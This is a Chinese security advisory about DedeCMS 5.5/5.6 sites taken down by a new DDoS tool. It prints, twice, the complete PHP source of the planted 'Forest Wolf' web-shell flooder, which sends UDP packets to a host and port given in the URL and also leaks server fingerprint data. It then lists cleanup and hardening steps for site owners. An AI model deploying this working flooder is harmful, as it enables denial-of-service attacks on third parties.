关于织梦5.5/5.6漏洞造成网站瘫痪及处理方式
 

大批使用织梦5.5/5.6内核的网站瘫痪,网站被运营商停止.而这些被停止的网站均是使用了织梦5.5和5.6内核版本的网站程序.据一些知名网络安全服务商监控数据显示.近日,新型DDOS工具利用织梦5.5和5.6漏洞,造成了国内大批织梦程序瘫痪.目前,织梦官方没有据此回应.以下是网络安全服务商检测出的攻击织梦漏洞的木马病毒,提醒站长注意.

set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port']; $exec_time = $_GET['time'];
$Sendlen = 65535; $packets = 0; ignore_user_abort(True);
if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0)
{ if (StrLen($_GET['rat'])<>0)
{ echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVE
R_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat']; exit; }
echo "Forest Wolf:DDOS:lw"; exit; } for($i=0;$i<$Sendlen;$i++){ $out .= "A"; }
$max_time = time()+$exec_time; while(1){ $packets++; if(time() > $max_time){
break; } $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
if($fp){ fwrite($fp, $out); fclose($fp); } }
echo "Send Host:$host:$port ";
echo "Send Flow:$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb /
1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb "; echo "Send Rate:"
. round($packets/$exec_time, 2) . " packs/s;" . round($packets/$exec_time*$Sendlen
/1024/1024, 2) . " mb/s"; ?> set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$Sendlen = 65535;
$packets = 0;
ignore_user_abort(True);
if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
if (StrLen($_GET['rat'])<>0){
echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME
'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
exit;
}
echo "Forest Wolf:DDOS:lw";
exit;
}
for($i=0;$i<$Sendlen;$i++){
$out .= "A";
}
$max_time = time()+$exec_time;
while(1){ $packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
&nbsp; fclose($fp);
}
}
echo "Send Host:$host:$port
";
echo "Send Flow:$packets * ($Sendlen/1024=" . round($Sendlen/102
4, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb
";
echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" . rou
nd($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s";
?>

如果您使用了DedeCMS程序,因目前DedeCMS暂未发布补丁修复,请立即按如下流程处理:

1.在dedecms的后台更新补丁,尽可能升级为最新版本.
2.data、templets、uploads、install、plus这几个目录用控制面板的“目录保护”功能 禁止执行权限 .
3.如果只是使用文章系统并没有使用会员功能,则强推推荐:关闭会员功能、关闭新会员注册、直接删除member目录或改名.
4.用dedecms后台的“系统”中的文件校验和病毒扫描功能 查杀病毒木马.
5.检查有无/data/cache/t.php 、/data/cache/x.php和/plus/index.php 这些木马文件,有的话则应立即删除.


提醒各位站长站朋友,请及时更新网站补丁.同时在更新补丁前请全面检查网站是否已经被入侵,若被入侵请先做好处理工作,与此同时也要常常关注织梦官方的动态信息.







  


公司地址:成都市金牛区蜀汉路238号元亨商贸楼605室
夜间值班:18982208090(24H) 13438034514(24H)
备案专线:028-64605897转806(周一至周五)
技术专线:028-62454538(周一至周五)
电子邮件:service#34514.cn(#替@)

CopyRight © 2004-2022 All Rights Reserved 成都织梦信息技术有限公司 © 严禁复制
蜀ICP备09003074号-1 川公网安备 51010602000340号